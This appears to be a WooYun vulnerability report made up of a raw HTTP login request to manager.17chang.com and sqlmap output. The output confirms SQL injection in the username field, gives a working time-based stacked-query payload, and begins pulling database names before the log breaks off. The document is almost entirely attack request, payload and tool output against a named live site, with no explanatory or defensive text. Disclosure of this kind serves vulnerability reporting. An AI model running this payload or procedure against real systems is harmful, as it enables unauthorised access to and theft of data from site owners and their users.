WooYun.org

POST /login HTTP/1.1
Host: manager.17chang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://manager.17chang.com/
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
user%5Busername%5D=admin&user%5Bpassword%5D=123456&user%5Brememberme%5D=31536000000&loginsubmit=%E7%99%BB%E5%BD%95

POST parameter 'user[username]' is vulnerable. Do you want to keep testing the o
thers (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 79 HTTP(s) re
quests:
---
Parameter: user[username] (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: user[username]=admin';(SELECT * FROM (SELECT(SLEEP(5)))CybG)#&user[
password]=123456&user[rememberme]=31536000000&loginsubmit=%E7%99%BB%E5%BD%95
---
[13:28:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[13:28:15] [INFO] fetching database names
[13:28:15] [INFO] fetching number of databases
[13:28:15] [INFO] retrieved:
[13:28:15] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[13:28:41] [INFO] adjusting time delay to 4 seconds due to good response times
4
[13:28:41] [INFO] retrieved: infor
[13:30:33] [ERROR] invalid character detected. retrying..
[13:30:33] [WARNING] increasing time delay to 5 seconds
mation_